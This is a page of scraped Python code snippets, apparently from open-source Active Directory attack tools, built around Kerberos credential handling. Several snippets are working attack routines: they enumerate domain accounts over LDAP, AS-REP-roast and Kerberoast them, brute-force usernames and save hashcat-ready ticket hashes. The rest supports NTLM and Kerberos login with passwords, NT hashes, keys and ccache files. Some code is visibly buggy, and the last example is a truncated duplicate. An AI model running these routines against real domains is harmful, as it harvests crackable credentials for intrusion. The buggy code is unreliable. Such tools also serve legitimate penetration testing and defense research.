Exemplo n.º 1
0
	async def get_targets(self):
		try:
			q_asrep = self.session.query(ADUser).filter_by(ad_id = self.ad_id).filter(ADUser.UAC_DONT_REQUIRE_PREAUTH == True)
			q_spn = self.session.query(ADUser).filter_by(ad_id = self.ad_id).filter(ADUser.servicePrincipalName != None)
			
			for user in q_asrep.all():
				if user.sAMAccountName == 'krbtgt':
					continue
				cred = KerberosCredential()
				cred.username = user.sAMAccountName
				cred.domain = self.domain_name
				self.targets_asreq[user.id] = cred
				self.total_targets += 1

			for user in q_spn.all():
				if user.sAMAccountName == 'krbtgt':
					continue
				target = KerberosSPN()
				target.username = user.sAMAccountName
				target.domain = self.domain_name
				self.targets_spn[user.id] = target
				self.total_targets += 1

			return True, None
		except Exception as e:
			return None, e
Exemplo n.º 2
0
    def get_kerberos_cred(self):
        secret = None
        stye = None
        if self.krb_rc4_hmac is not None:
            stype = KerberosSecretType.RC4
            secret = self.krb_rc4_hmac

        if self.nt_hash is not None:
            stype = KerberosSecretType.RC4
            secret = self.nt_hash

        elif self.krb_aes128 is not None:
            stype = KerberosSecretType.AES
            secret = self.krb_aes128

        elif self.krb_aes256 is not None:
            stype = KerberosSecretType.AES
            secret = self.krb_aes256

        if stye is None:
            raise Exception('Couldnt figure out correct stype for credential!')

        kc = KerberosCredential()
        kc.add_secret(stype, secret)
        return kc
Exemplo n.º 3
0
def get_target_from_args(args, to_spn=True):
    targets = []
    if args.user:
        for user in args.user:
            domain = None
            username = None
            if user.find('@') != -1:
                #we take for granted that usernames do not have the char / in them!
                username, domain = user.split('@')
            else:
                username = user

            if args.realm:
                domain = args.realm
            else:
                if domain is None:
                    raise Exception(
                        'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                    )
            if to_spn is True:
                target = KerberosSPN()
                target.username = username
                target.domain = domain
            else:
                target = KerberosCredential()
                target.username = username
                target.domain = domain
            targets.append(target)
    return targets
Exemplo n.º 4
0
def get_targets_from_file(args, to_spn=True):
    targets = []
    if args.targets:
        with open(args.targets, 'r') as f:
            for line in f:
                line = line.strip()
                domain = None
                username = None
                if line.find('@') != -1:
                    #we take for granted that usernames do not have the char @ in them!
                    username, domain = line.split('@')
                else:
                    username = line

                if args.realm:
                    domain = args.realm
                else:
                    if domain is None:
                        raise Exception(
                            'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                        )

                if to_spn is True:
                    target = KerberosSPN()
                    target.username = username
                    target.domain = domain
                else:
                    target = KerberosCredential()
                    target.username = username
                    target.domain = domain
                targets.append(target)
    return targets
Exemplo n.º 5
0
async def get_ldap_kerberos_targets(ldap_url, target_type = 'all', authmethod = 'ntlm', host = None):
	if ldap_url == 'auto':
		ldap_url = get_ldap_url(authmethod = authmethod, host = host)
	
	msldap_url = MSLDAPURLDecoder(ldap_url)
	client = msldap_url.get_client()
	_, err = await client.connect()
	if err is not None:
		raise err

	domain = client._ldapinfo.distinguishedName.replace('DC=','').replace(',','.')
	spn_users = []
	asrep_users = []

	if target_type == 'asrep' or target_type == 'all':
		async for user, err in client.get_all_knoreq_users():
			if err is not None:
				raise err
			cred = KerberosCredential()
			cred.username = user.sAMAccountName
			cred.domain = domain
				
			asrep_users.append(cred)
	
	if target_type == 'spn' or target_type == 'all':
		async for user, err in client.get_all_service_users():
			if err is not None:
				raise err
			cred = KerberosSPN()
			cred.username = user.sAMAccountName
			cred.domain = domain
				
			spn_users.append(cred)
	
	return asrep_users, spn_users
Exemplo n.º 6
0
def process_target_line(target, realm=None, to_spn=True):
    spn = KerberosSPN()
    if to_spn is False:
        spn = KerberosCredential()
    line = target.strip()
    if line == '':
        return None
    m = line.find('@')
    if m == -1:
        if realm is not None:
            spn.username = line
            spn.domain = realm
        else:
            raise Exception(
                'User %s is missing realm specification and no global realm is defined!'
                % line)

    else:
        spn.username, spn.domain = line.split('@', 1)
        if realm is not None:
            spn.domain = realm

    return spn
Exemplo n.º 7
0
async def live_roast(outfile=None):
    try:
        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        results = []
        final_results = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        if outfile is not None:
            filename = outfile + 'asreproast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    asrep_cnt += 1
                    f.write(thash + '\r\n')
        else:
            final_results += results

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            try:
                ctx = AcquireCredentialsHandle(None, 'kerberos', spn_name,
                                               SECPKG_CRED.OUTBOUND)
                res, ctx, data, outputflags, expiry = InitializeSecurityContext(
                    ctx,
                    spn_name,
                    token=None,
                    ctx=ctx,
                    flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION)
                if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
                    ticket = InitialContextToken.load(
                        data[0][1]).native['innerContextToken']
                else:
                    raise Exception('Error %s' % res.value)
            except Exception as e:
                print(e)
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if outfile is not None:
            filename = outfile + 'spnroast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    spn_cnt += 1
                    f.write(thash + '\r\n')

        else:
            final_results += results

        return final_results, errors, None

    except Exception as e:
        return None, None, e
Exemplo n.º 8
0
    def build(self):
        if self.creds.auth_method == LDAPAuthProtocol.SICILY:
            ntlmcred = MSLDAPNTLMCredential()
            ntlmcred.username = self.creds.username
            ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False
            ntlmcred.encrypt = self.creds.encrypt

            if self.creds.password is None:
                raise Exception(
                    'NTLM authentication requres password/NT hash!')

            if len(self.creds.password) == 32:
                try:
                    bytes.fromhex(self.creds.password)
                except:
                    ntlmcred.password = self.creds.password
                else:
                    ntlmcred.nt_hash = self.creds.password

            else:
                ntlmcred.password = self.creds.password

            settings = NTLMHandlerSettings(ntlmcred)
            return NTLMAUTHHandler(settings)

        elif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:
            cred = MSLDAPPLAINCredential()
            cred.username = self.creds.username
            cred.domain = self.creds.domain
            cred.password = self.creds.password
            return cred

        elif self.creds.auth_method == LDAPAuthProtocol.PLAIN:
            cred = MSLDAPSIMPLECredential()
            cred.username = self.creds.username
            cred.domain = self.creds.domain
            cred.password = self.creds.password
            return cred

        elif self.creds.auth_method in [
                LDAPAuthProtocol.NTLM_PASSWORD, LDAPAuthProtocol.NTLM_NT
        ]:
            ntlmcred = MSLDAPNTLMCredential()
            ntlmcred.username = self.creds.username
            ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False
            ntlmcred.encrypt = self.creds.encrypt

            if self.creds.password is None:
                raise Exception('NTLM authentication requres password!')

            if self.creds.auth_method == LDAPAuthProtocol.NTLM_PASSWORD:
                ntlmcred.password = self.creds.password
            elif self.creds.auth_method == LDAPAuthProtocol.NTLM_NT:
                ntlmcred.nt_hash = self.creds.password
            else:
                raise Exception('Unknown NTLM auth method!')

            settings = NTLMHandlerSettings(ntlmcred)
            handler = NTLMAUTHHandler(settings)

            ##setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)

            return spneg

        elif self.creds.auth_method in [
                LDAPAuthProtocol.KERBEROS_RC4, LDAPAuthProtocol.KERBEROS_NT,
                LDAPAuthProtocol.KERBEROS_AES,
                LDAPAuthProtocol.KERBEROS_PASSWORD,
                LDAPAuthProtocol.KERBEROS_CCACHE,
                LDAPAuthProtocol.KERBEROS_KEYTAB
        ]:

            if self.target is None:
                raise Exception('Target must be specified with Kerberos!')

            if self.target.host is None:
                raise Exception(
                    'target must have a domain name or hostname for kerberos!')

            if self.target.dc_ip is None:
                raise Exception('target must have a dc_ip for kerberos!')

            kcred = MSLDAPKerberosCredential()
            kc = KerberosCredential()
            kc.username = self.creds.username
            kc.domain = self.creds.domain
            kcred.enctypes = []
            if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PASSWORD:
                kc.password = self.creds.password
                kcred.enctypes = [23, 17, 18]
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_NT:
                kc.nt_hash = self.creds.password
                kcred.enctypes = [23]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_AES:
                if len(self.creds.password) == 32:
                    kc.kerberos_key_aes_128 = self.creds.password
                    kcred.enctypes = [17]
                elif len(self.creds.password) == 64:
                    kc.kerberos_key_aes_256 = self.creds.password
                    kcred.enctypes = [18]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_RC4:
                kc.kerberos_key_rc4 = self.creds.password
                kcred.enctypes = [23]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
                kc.ccache = self.creds.password
                kcred.enctypes = [23, 17, 18]
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
                kc.keytab = self.creds.password
                kcred.enctypes = [23, 17, 18]
            else:
                raise Exception(
                    'No suitable secret type found to set up kerberos!')

            if self.creds.etypes is not None:
                kcred.enctypes = list(
                    set(self.creds.etypes).intersection(set(kcred.enctypes)))

            kcred.ccred = kc
            kcred.spn = KerberosSPN.from_target_string(
                self.target.to_target_string())
            kcred.target = KerberosTarget(self.target.dc_ip)
            kcred.encrypt = self.creds.encrypt

            if self.target.proxy is not None:
                kcred.target.proxy = KerberosProxy()
                kcred.target.proxy.type = self.target.proxy.type
                kcred.target.proxy.target = copy.deepcopy(
                    self.target.proxy.target)
                kcred.target.proxy.target.endpoint_ip = self.target.dc_ip
                kcred.target.proxy.target.endpoint_port = 88
                kcred.target.proxy.creds = copy.deepcopy(
                    self.target.proxy.auth)

            handler = MSLDAPKerberos(kcred)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif self.creds.auth_method == LDAPAuthProtocol.SSPI_KERBEROS:
            if self.target is None:
                raise Exception('Target must be specified with Kerberos SSPI!')

            kerbcred = MSLDAPKerberosSSPICredential()
            kerbcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
            kerbcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
            kerbcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
            kerbcred.spn = self.target.to_target_string()
            kerbcred.encrypt = self.creds.encrypt

            handler = MSLDAPKerberosSSPI(kerbcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif self.creds.auth_method == LDAPAuthProtocol.SSPI_NTLM:
            ntlmcred = MSLDAPNTLMSSPICredential()
            ntlmcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
            ntlmcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
            ntlmcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
            ntlmcred.encrypt = self.creds.encrypt

            handler = MSLDAPNTLMSSPI(ntlmcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
            return spneg

        elif self.creds.auth_method.value.startswith('MULTIPLEXOR'):
            if self.creds.auth_method in [
                    LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM,
                    LDAPAuthProtocol.MULTIPLEXOR_NTLM
            ]:
                from msldap.authentication.ntlm.multiplexor import MSLDAPNTLMMultiplexor
                ntlmcred = MSLDAPMultiplexorCredential()
                ntlmcred.type = 'NTLM'
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(self.creds.settings)
                ntlmcred.encrypt = self.creds.encrypt

                handler = MSLDAPNTLMMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif self.creds.auth_method in [
                    LDAPAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
                    LDAPAuthProtocol.MULTIPLEXOR_KERBEROS
            ]:
                from msldap.authentication.kerberos.multiplexor import MSLDAPKerberosMultiplexor

                ntlmcred = MSLDAPMultiplexorCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = self.target
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(self.creds.settings)
                ntlmcred.encrypt = self.creds.encrypt

                handler = MSLDAPKerberosMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg
Exemplo n.º 9
0
async def amain(args):
    if args.command == 'tgs':
        logging.debug('[TGS] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        spn = KerberosSPN.from_user_email(args.spn)

        logging.debug('[TGS] target user: %s' % spn.get_formatted_pname())
        logging.debug('[TGS] fetching TGT')
        kcomm = AIOKerberosClient(cred, target)
        await kcomm.get_TGT()
        logging.debug('[TGS] fetching TGS')
        await kcomm.get_TGS(spn)

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGS] done!')

    elif args.command == 'tgt':
        logging.debug('[TGT] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()

        logging.debug('[TGT] cred: %s' % cred)
        logging.debug('[TGT] target: %s' % target)

        kcomm = AIOKerberosClient(cred, target)
        logging.debug('[TGT] fetching TGT')
        await kcomm.get_TGT()

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGT] Done! TGT stored in CCACHE file')

    elif args.command == 'asreproast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')
        creds = []
        targets = get_targets_from_file(args, False)
        targets += get_target_from_args(args, False)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('[ASREPRoast] loaded %d targets' % len(targets))
        logging.debug(
            '[ASREPRoast] will suppoort the following encryption type: %s' %
            (str(args.etype)))

        ks = KerberosTarget(args.address)
        ar = APREPRoast(ks)
        hashes = []
        for target in targets:
            h = await ar.run(target, override_etype=[args.etype])
            hashes.append(h)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('ASREPRoast complete')

    elif args.command == 'spnroast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('Kerberoast loaded %d targets' % len(targets))

        if args.etype:
            if args.etype == -1:
                etypes = [23, 17, 18]
            else:
                etypes = [args.etype]
        else:
            etypes = [23, 17, 18]

        logging.debug(
            'Kerberoast will suppoort the following encryption type(s): %s' %
            (','.join(str(x) for x in etypes)))

        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        ar = Kerberoast(target, cred)
        hashes = await ar.run(targets, override_etype=etypes)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('Kerberoast complete')

    elif args.command == 'brute':
        target = KerberosTarget(args.address)

        with open(args.targets, 'r') as f:
            for line in f:
                line = line.strip()
                spn = KerberosSPN()
                spn.username = line
                spn.domain = args.realm

                ke = KerberosUserEnum(target, spn)

                result = await ke.run()
                if result is True:
                    if args.out_file:
                        with open(args.out_file, 'a') as f:
                            f.write(result + '\r\n')
                    else:
                        print('[+] Enumerated user: %s' % str(spn))

        logging.info('Kerberos user enumeration complete')

    elif args.command == 'spnroast-sspi':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        results = []
        errors = []
        for spn_name in targets:
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(
                    spn_name.get_formatted_pname())
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')

        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        logging.info('SSPI based Kerberoast complete')

    elif args.command == 'spnroast-multiplexor':
        #hiding the import so it's not necessary to install multiplexor
        await spnmultiplexor(args)

    elif args.command == 'auto':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        domain = args.dc_ip
        url = 'ldap+sspi-ntlm://%s' % domain
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        results = []
        errors = []
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[args.etype])
            results.append(res)

        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')
        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

    elif args.command == 'ldap':
        ldap_url = MSLDAPURLDecoder(args.ldap_url)
        client = ldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')

        if args.out_file:
            basefolder = ntpath.dirname(args.out_file)
            basefile = ntpath.basename(args.out_file)

        if args.type in ['spn', 'all']:
            logging.debug('Enumerating SPN user accounts...')
            cnt = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_spn_users.txt'),
                          'w',
                          newline='') as f:
                    async for user in client.get_all_service_users():
                        cnt += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))

            else:
                print('[+] SPN users')
                async for user, err in client.get_all_service_users():
                    if err is not None:
                        raise err
                    cnt += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d SPN user accounts' % cnt)

        if args.type in ['asrep', 'all']:
            logging.debug('Enumerating ASREP user accounts...')
            ctr = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_asrep_users.txt'),
                          'w',
                          newline='') as f:
                    async for user, err in client.get_all_knoreq_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))
            else:
                print('[+] ASREP users')
                async for user, err in client.get_all_knoreq_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d ASREP user accounts' % ctr)

        if args.type in ['full', 'all']:
            logging.debug(
                'Enumerating ALL user accounts, this will take some time depending on the size of the domain'
            )
            ctr = 0
            attrs = args.attrs if args.attrs is not None else MSADUser_TSV_ATTRS
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_users.tsv'),
                          'w',
                          newline='',
                          encoding='utf8') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(attrs)
                    async for user, err in client.get_all_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow(user.get_row(attrs))

            else:
                logging.debug('Are you sure about this?')
                print('[+] Full user dump')
                print('\t'.join(attrs))
                async for user, err in client.get_all_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([str(x) for x in user.get_row(attrs)]))

            logging.debug('Enumerated %d user accounts' % ctr)

        if args.type in ['custom']:
            if not args.filter:
                raise Exception(
                    'Custom LDAP search requires the search filter to be specified!'
                )
            if not args.attrs:
                raise Exception(
                    'Custom LDAP search requires the attributes to be specified!'
                )

            logging.debug(
                'Perforing search on the AD with the following filter: %s' %
                args.filter)
            logging.debug('Search will contain the following attributes: %s' %
                          ','.join(args.attrs))
            ctr = 0

            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_custom.tsv'),
                          'w',
                          newline='') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(args.attrs)
                    async for obj, err in client.pagedsearch(
                            args.filter, args.attrs):
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow([
                            str(obj['attributes'].get(x, 'N/A'))
                            for x in args.attrs
                        ])

            else:
                async for obj, err in client.pagedsearch(
                        args.filter, args.attrs):
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([
                        str(obj['attributes'].get(x, 'N/A'))
                        for x in args.attrs
                    ]))
Exemplo n.º 10
0
async def run_auto():
    try:
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        from winacl.functions.highlevel import get_logon_info

        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        filename = 'asreproast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                asrep_cnt += 1
                f.write(thash + '\r\n')

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        filename = 'spnroast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                spn_cnt += 1
                f.write(thash + '\r\n')

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        print('[+] Done! %s spnroast tickets %s asreproast tickets' %
              (spn_cnt, asrep_cnt))
    except Exception as e:
        print(e)
Exemplo n.º 11
0
    def get_creds(self):
        if self.secret_type == KerberosSecretType.KEYTAB:
            return KerberosCredential.from_keytab(self.secret, self.username,
                                                  self.domain)

        res = KerberosCredential()
        res.username = self.username
        res.domain = self.domain

        if self.secret_type in [
                KerberosSecretType.PASSWORD, KerberosSecretType.PW,
                KerberosSecretType.PASS
        ]:
            res.password = self.secret
        elif self.secret_type in [
                KerberosSecretType.NT, KerberosSecretType.RC4
        ]:
            if len(self.secret) != 32:
                raise Exception('Incorrect RC4/NT key! %s' % self.secret)
            res.nt_hash = self.secret
            res.kerberos_key_rc4 = self.secret
        elif self.secret_type in [
                KerberosSecretType.AES128, KerberosSecretType.AES256,
                KerberosSecretType.AES
        ]:
            if self.secret_type == KerberosSecretType.AES:
                if len(self.secret) == 32:
                    res.kerberos_key_aes_128 = self.secret
                elif len(self.secret) == 64:
                    res.kerberos_key_aes_256 = self.secret
                else:
                    raise Exception('Incorrect AES key! %s' % self.secret)
            elif self.secret_type == KerberosSecretType.AES128:
                if len(self.secret) != 32:
                    raise Exception('Incorrect AES128 key! %s' % self.secret)
                res.kerberos_key_aes_128 = self.secret
            else:
                if len(self.secret) != 64:
                    raise Exception('Incorrect AES256 key! %s' % self.secret)
                res.kerberos_key_aes_256 = self.secret
        elif self.secret_type == KerberosSecretType.DES:
            if len(self.secret) != 16:
                raise Exception('Incorrect DES key! %s' % self.secret)
            res.kerberos_key_des = self.secret
        elif self.secret_type in [
                KerberosSecretType.DES3, KerberosSecretType.TDES
        ]:
            if len(self.secret) != 24:
                raise Exception('Incorrect DES3 key! %s' % self.secret)
            res.kerberos_key_des3 = self.secret
        elif self.secret_type == KerberosSecretType.CCACHE:
            res.ccache = self.secret
        else:
            raise Exception('Missing/unknown secret_type!')

        return res
Exemplo n.º 12
0
    def build(self):
        if self.creds.auth_method == LDAPAuthProtocol.SICILY:
            ntlmcred = MSLDAPNTLMCredential()
            ntlmcred.username = self.creds.username
            ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False
            ntlmcred.encrypt = self.creds.encrypt

            if self.creds.password is None:
                raise Exception(
                    'NTLM authentication requres password/NT hash!')

            if len(self.creds.password) == 32:
                try:
                    bytes.fromhex(self.creds.password)
                except:
                    ntlmcred.password = self.creds.password
                else:
                    ntlmcred.nt_hash = self.creds.password

            else:
                ntlmcred.password = self.creds.password

            settings = NTLMHandlerSettings(ntlmcred)
            return NTLMAUTHHandler(settings)

        elif self.creds.auth_method == LDAPAuthProtocol.SIMPLE:
            cred = MSLDAPPLAINCredential()
            cred.username = self.creds.username
            cred.domain = self.creds.domain
            cred.password = self.creds.password
            return cred

        elif self.creds.auth_method == LDAPAuthProtocol.PLAIN:
            cred = MSLDAPSIMPLECredential()
            cred.username = self.creds.username
            cred.domain = self.creds.domain
            cred.password = self.creds.password
            return cred

        elif self.creds.auth_method in [
                LDAPAuthProtocol.NTLM_PASSWORD, LDAPAuthProtocol.NTLM_NT
        ]:
            ntlmcred = MSLDAPNTLMCredential()
            ntlmcred.username = self.creds.username
            ntlmcred.domain = self.creds.domain if self.creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False
            ntlmcred.encrypt = self.creds.encrypt

            if self.creds.password is None:
                raise Exception('NTLM authentication requres password!')

            if self.creds.auth_method == LDAPAuthProtocol.NTLM_PASSWORD:
                ntlmcred.password = self.creds.password
            elif self.creds.auth_method == LDAPAuthProtocol.NTLM_NT:
                ntlmcred.nt_hash = self.creds.password
            else:
                raise Exception('Unknown NTLM auth method!')

            settings = NTLMHandlerSettings(ntlmcred)
            handler = NTLMAUTHHandler(settings)

            ##setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)

            return spneg

        elif self.creds.auth_method in [
                LDAPAuthProtocol.KERBEROS_RC4, LDAPAuthProtocol.KERBEROS_NT,
                LDAPAuthProtocol.KERBEROS_AES,
                LDAPAuthProtocol.KERBEROS_PASSWORD,
